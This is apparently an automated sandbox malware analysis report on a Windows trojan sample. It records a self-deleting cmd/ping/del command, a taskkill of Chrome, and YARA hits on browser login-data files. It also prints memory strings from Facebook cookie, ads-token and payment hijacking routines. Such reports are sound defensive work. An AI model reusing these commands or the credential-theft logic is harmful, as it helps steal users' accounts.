Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Overview

General Information

Sample Name:	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
Analysis ID:	385405
MD5:	29389832e538957dc769cf709f80144a
SHA1:	72f5ca06d840acbc9b49e4096e341c0dbaac891e
SHA256:	d6d2e00343a3cad48cc2f4799ce87d27acc3ce154aed286c07f226de2e9c4035
Infos:
Most interesting Screenshot:

Detection

Score:	93
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to detect sleep reduction / modifications

Contains functionality to infect the boot sector

Hides threads from debuggers

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file has a writeable .text section

Registers a new ROOT certificate

Tries to harvest and steal browser information (history, passwords, etc)

Tries to resolve many domain names, but no domain seems valid

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read device registry values (via SetupAPI)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Installs a Chrome extension

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries device information via Setup API

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Startup

System is w10x64

SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe (PID: 6484 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe' MD5: 29389832E538957DC769CF709F80144A)

msiexec.exe (PID: 6620 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

26FF190E7AE0F7C7.exe (PID: 6852 cmdline: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp3 MD5: 29389832E538957DC769CF709F80144A)

1618258522437.exe (PID: 7000 cmdline: 'C:\Users\user\AppData\Roaming\1618258522437.exe' /sjson 'C:\Users\user\AppData\Roaming\1618258522437.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)

ThunderFW.exe (PID: 5928 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)

cmd.exe (PID: 6692 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 4936 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

26FF190E7AE0F7C7.exe (PID: 6868 cmdline: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp3 MD5: 29389832E538957DC769CF709F80144A)

cmd.exe (PID: 7060 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 4568 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cmd.exe (PID: 3688 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 5092 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

cmd.exe (PID: 6900 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 6940 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

msiexec.exe (PID: 6780 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 97BC0791AD59D06459021C46045665AB C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.369233907.00000000025B0000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
00000000.00000002.355375911.00000000025D0000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
00000006.00000002.438715489.0000000002660000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.26FF190E7AE0F7C7.exe.2660000.5.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.25d0000.4.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.10000000.6.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
6.2.26FF190E7AE0F7C7.exe.10000000.11.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
7.2.26FF190E7AE0F7C7.exe.25b0000.5.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
7.2.26FF190E7AE0F7C7.exe.10000000.11.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
7.2.26FF190E7AE0F7C7.exe.25b0000.5.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.25d0000.4.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
6.2.26FF190E7AE0F7C7.exe.2660000.5.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
6.2.26FF190E7AE0F7C7.exe.3140000.7.unpack	APT34_PICKPOCKET	unknown	unknown	0x1fece4:$s2: \nss3.dll 0x247d58:$s2: \nss3.dll 0x3fa4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1ced54:$s5: \Login Data 0x1cee44:$s5: \Login Data 0x1cef34:$s5: \Login Data 0x1cf074:$s5: \Login Data 0x1cf284:$s5: \Login Data 0x1cf304:$s5: \Login Data 0x1cf384:$s5: \Login Data 0x1cf448:$s5: \Login Data 0x1cf644:$s5: \Login Data 0x1cf754:$s5: \Login Data 0x1cf8e4:$s5: \Login Data 0x1cf954:$s5: \Login Data 0x1fed58:$s6: %s\Mozilla\Firefox\profiles.ini 0x247dd8:$s6: %s\Mozilla\Firefox\profiles.ini 0x1ced55:$s7: Login Data 0x1cee45:$s7: Login Data 0x1cef35:$s7: Login Data 0x1cf075:$s7: Login Data
7.2.26FF190E7AE0F7C7.exe.3170000.7.unpack	APT34_PICKPOCKET	unknown	unknown	0x1fece4:$s2: \nss3.dll 0x247d58:$s2: \nss3.dll 0x3fa4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1ced54:$s5: \Login Data 0x1cee44:$s5: \Login Data 0x1cef34:$s5: \Login Data 0x1cf074:$s5: \Login Data 0x1cf284:$s5: \Login Data 0x1cf304:$s5: \Login Data 0x1cf384:$s5: \Login Data 0x1cf448:$s5: \Login Data 0x1cf644:$s5: \Login Data 0x1cf754:$s5: \Login Data 0x1cf8e4:$s5: \Login Data 0x1cf954:$s5: \Login Data 0x1fed58:$s6: %s\Mozilla\Firefox\profiles.ini 0x247dd8:$s6: %s\Mozilla\Firefox\profiles.ini 0x1ced55:$s7: Login Data 0x1cee45:$s7: Login Data 0x1cef35:$s7: Login Data 0x1cf075:$s7: Login Data
Click to see the 6 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Metadefender: Detection: 25%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	ReversingLabs: Detection: 64%

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Virustotal: Detection: 75%	Perma Link
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Metadefender: Detection: 25%	Perma Link
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	ReversingLabs: Detection: 64%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

Unpacked PE file: 6.2.26FF190E7AE0F7C7.exe.2660000.5.unpack

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.6.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1618258522437.exe, 0000000B.00000000.357295730.000000000040F000.00000002.00020000.sdmp, 1618258522437.exe.6.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.6.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.6.dr
Source:	Binary string: atl71.pdb source: atl71.dll.6.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_user.dll.6.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.6.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.6.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.6.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.6.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.6.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001B.00000002.420452829.0000000000B9C000.00000002.00020000.sdmp, ThunderFW.exe.6.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.6.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.6.dr
Source:	Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI39DD.tmp.3.dr

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001A1D0 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001A1D0 FindFirstFileA,FindClose,

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\

Networking:

Tries to resolve many domain names, but no domain seems valid

Show sources

Source: unknown	DNS traffic detected: query: c431a802ff4a46b5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 55BE681FC6760236.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 61d53b5a4bc1ab86.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9ed2feea30c3cc5d.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: BDC347C728B2D94D.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 55be681fc6760236.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bdc347c728b2d94d.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: C431A802FF4A46B5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9ED2FEEA30C3CC5D.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: back19e64ea00d6ecfe1.io replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 84B5A35D6E5335EF.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 61D53B5A4BC1AB86.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 84b5a35d6e5335ef.com replaycode: Name error (3)

Uses ping.exe to check the status of other devices and networks

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: unknown	DNS traffic detected: query: c431a802ff4a46b5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 55BE681FC6760236.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 61d53b5a4bc1ab86.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9ed2feea30c3cc5d.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: BDC347C728B2D94D.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 55be681fc6760236.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bdc347c728b2d94d.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: C431A802FF4A46B5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9ED2FEEA30C3CC5D.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: back19e64ea00d6ecfe1.io replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 84B5A35D6E5335EF.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 61D53B5A4BC1AB86.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 84b5a35d6e5335ef.com replaycode: Name error (3)

Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: &AboutZwww.VB-CABLE.com web site[News are on Facebook ! equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: _time":"13245952903455635","lastpingday":"13245947457776957","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@@@@https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: /Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: /Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://www.facebook.com/pages/VB-Audio-Software/396002733802606 equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
